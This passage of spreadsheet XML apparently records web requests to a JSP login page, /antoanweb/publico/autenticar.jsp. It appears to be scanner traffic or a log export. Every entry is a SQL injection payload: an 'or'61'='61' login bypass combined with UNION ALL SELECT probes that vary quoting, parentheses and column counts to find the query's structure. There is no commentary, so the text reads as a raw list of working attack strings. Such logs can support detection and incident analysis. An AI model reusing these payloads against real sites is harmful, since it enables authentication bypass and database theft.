    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('hths'='hths&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('swgr'='swgr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('rurz'='rurz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--and((('nxmu'='nxmu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--and((('zwrr'='zwrr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--and((('brcz'='brcz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'lgqr'='lgqr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'dyoh'='dyoh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'tqqc'='tqqc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'lpfy'='lpfy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'ekae'='ekae&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'vhbe'='vhbe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'bvxy'='bvxy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--and'ffem'='ffem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--and'yphm'='yphm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--and'juvj'='juvj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('coyb'like'coyb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('kmqi'like'kmqi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('acri'like'acri&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('vhhp'like'vhhp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('fanb'like'fanb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('kvvb'like'kvvb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('sfrz'like'sfrz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--and('iewv'like'iewv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--and('avun'like'avun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--and('wfkt'like'wfkt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('ypnu'like'ypnu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('bgdl'like'bgdl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('nukf'like'nukf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('gaiu'like'gaiu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('ppdi'like'ppdi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('jcqk'like'jcqk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('yybt'like'yybt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--and(('vfyr'like'vfyr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--and(('hszz'like'hszz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--and(('ozdc'like'ozdc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('dwyj'like'dwyj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('eogc'like'eogc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('bmtd'like'bmtd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('sbbz'like'sbbz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('dswn'like'dswn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('quhj'like'quhj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('afwo'like'afwo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--and((('pmpf'like'pmpf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--and((('qbec'like'qbec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--and((('tzfz'like'tzfz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'diii'like'diii&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'bfjb'like'bfjb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'icrs'like'icrs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'naqn'like'naqn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'hdcn'like'hdcn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'tiqq'like'tiqq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'ufiy'like'ufiy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--and'mhbh'like'mhbh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--and'uvbr'like'uvbr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--and'bdpb'like'bdpb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("huqu"="huqu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("ppqm"="ppqm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("kqlm"="kqlm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("yyyk"="yyyk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("mksb"="mksb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("quij"="quij&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("dfna"="dfna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--and("odps"="odp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--and("malq"="malq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--and("gcyy"="gcyy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("nzfz"="nzfz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("omva"="omva&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("ihby"="ihby&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("dmgg"="dmgg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("ydld"="ydld&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("xtjp"="xtjp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("luyr"="luyr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--and(("gkvy"="gkvy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--and(("ygaw"="ygaw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--and(("fbzo"="fbzo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("kahp"="kahp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("seig"="seig&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("kmzz"="kmzz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("xooq"="xooq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("vxym"="vxym&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("rokj"="rokj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("pvyt"="pvyt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--and((("estn"="estn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--and((("dhcc"="dhcc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--and((("gljc"="gljc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"bato"="bato&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"kknq"="kknq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"jzff"="jzff&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"lrzs"="lrzs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"gkpn"="gkpn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"nkde"="nkde&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"domv"="domv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--and"cfcd"="cfcd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--and"yydb"="yydb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--and"fogz"="fogz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("nhiz"like"nhiz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("qjfi"like"qjfi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("upgb"like"upgb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("kspl"like"kspl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("yeqh"like"yeqh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("alkz"like"alkz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("fkcy"like"fkcy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--and("gxga"like"gxga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--and("mana"like"mana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--and("lyji"like"lyji&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("zcqy"like"zcqy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("cdco"like"cdco&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("gehv"like"gehv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("wyir"like"wyir&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("ydma"like"ydma&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("fifm"like"fifm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("xdyf"like"xdyf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--and(("adqf"like"adqf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--and(("urod"like"urod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--and(("rpsk"like"rpsk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("boqi"like"boqi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("kbvh"like"kbvh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("zrtm"like"zrtm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("yrhw"like"yrhw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("buuf"like"buuf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("kfhd"like"kfhd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("fvtj"like"fvtj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--and((("dowy"like"dowy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--and((("gjjf"like"gjjf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--and((("amcb"like"amcb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"pyki"like"pyki&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"qxfj"like"qxfj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"ayrs"like"ayrs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"heus"like"heus&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"ibih"like"ibih&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"vhze"like"vhze&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"vppb"like"vppb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--and"nhtv"like"nhtv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--and"aufo"like"aufo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--and"ebou"like"ebou&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect3990,3990,3990,3990,3990,3990,3990,3990,3990,3990,3990,3990,3990,3990,3990,3990,3990,3990,3990,3990,3990--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2216,2216,2216,2216,2216,2216,2216,2216,2216,2216,2216,2216,2216,2216,2216,2216,2216,2216,2216,2216,2216,2216--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect9061,9061,9061,9061,9061,9061,9061,9061,9061,9061,9061,9061,9061,9061,9061,9061,9061,9061,9061,9061,9061,9061,9061--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect9955,9955,9955,9955,9955,9955,9955,9955,9955,9955,9955,9955,9955,9955,9955,9955,9955,9955,9955,9955,9955,9955,9955,9955--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect6110,6110,6110,6110,6110,6110,6110,6110,6110,6110,6110,6110,6110,6110,6110,6110,6110,6110,6110,6110,6110,6110,6110,6110,6110,6110--&amp;modo=entrar</t>
  </si>
  <si>
